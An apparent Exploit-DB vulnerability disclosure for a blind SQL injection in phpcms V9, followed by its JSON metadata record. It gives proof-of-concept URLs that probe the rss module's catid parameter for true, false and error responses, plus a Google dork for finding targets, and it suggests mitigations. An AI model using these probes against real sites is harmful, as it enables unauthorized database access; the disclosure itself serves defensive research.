ID EDB-ID:16027
Type exploitdb
Reporter eidelweiss
Modified 2011-01-22T00:00:00
Description
phpcms 9.0 - Blind SQL Injection Vulnerability. Webapps exploit for php platform
=================================================================
phpcms V9 Blind SQL Injection Vulnerability
=================================================================
Software: phpcms V9
Vendor: www.phpcms.cn
Vuln Type: Blind SQL Injection
Download link: http://www.phpcms.cn/2010/1229/326.html
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^
References:
http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html
=================================================================
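exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
The affected parameter is catid in the rss request to the content module.
Example p0c
[!] http://host/index.php?m=content&c=rss&catid=10 <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False
[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
The differing True/False responses and the displayed MySQL error suggest that catid reaches the SQL query without validation. This advisory names no fixed version, so the relevant mitigations are to handle catid strictly as an integer (cast or allow-list it before it is used in the query) and to disable display of database errors to clients.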
=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
=========================| -=[ E0F ]=- |=========================
{"id": "EDB-ID:16027", "hash": "8305ae218992e2763d00d90e6fb7257b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpcms 9.0 - Blind SQL Injection Vulnerability", "description": "phpcms 9.0 - Blind SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2011-01-22T00:00:00", "modified": "2011-01-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/16027/", "reporter": "eidelweiss", "references": [], "cvelist": [], "lastseen": "2016-02-01T22:58:19", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-02-01T22:58:19"}, "dependencies": {"references": [], "modified": "2016-02-01T22:58:19"}, "vulnersScore": 0.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/16027/", "sourceData": "=================================================================\r\n\tphpcms V9 BLind SQL Injection Vulnerability\r\n=================================================================\r\n\r\nSoftware:\tphpcms V9\r\nVendor:\t\twww.phpcms.cn\r\nVuln Type:\tBLind SQL Injection\r\nDownload link:\thttp://www.phpcms.cn/2010/1229/326.html\r\nAuthor:\t\teidelweiss\r\ncontact:\teidelweiss[at]windowslive[dot]com\r\nHome:\t\twww.eidelweiss.info\r\n\r\nGoogle Dork:\thttp://www.exploit-db.com/ghdb/3676/\t// check here ^_^\r\n\r\nReferences:\r\nhttp://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html\r\n\r\n=================================================================\r\n\r\n\texploit & p0c\r\n\r\n[!]\tindex.php?m=content&c=rss&catid=[valid catid]\r\n\r\n\tExample p0c\r\n\r\n[!]\thttp://host/index.php?m=content&c=rss&catid=10\t<= True\r\n[!]\thttp://host/index.php?m=content&c=rss&catid=-10\t<= False\r\n\r\n[+]\thttp://host/index.php?m=content&c=rss&catid=5\t<= show MySQL Error (table)\r\n\r\n=================================================================\r\n\r\n\tNothing Impossible In This World Even 
Nobody`s Perfect\r\n\r\n=================================================================\r\n\r\n=========================| -=[ E0F ]=- |=========================\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}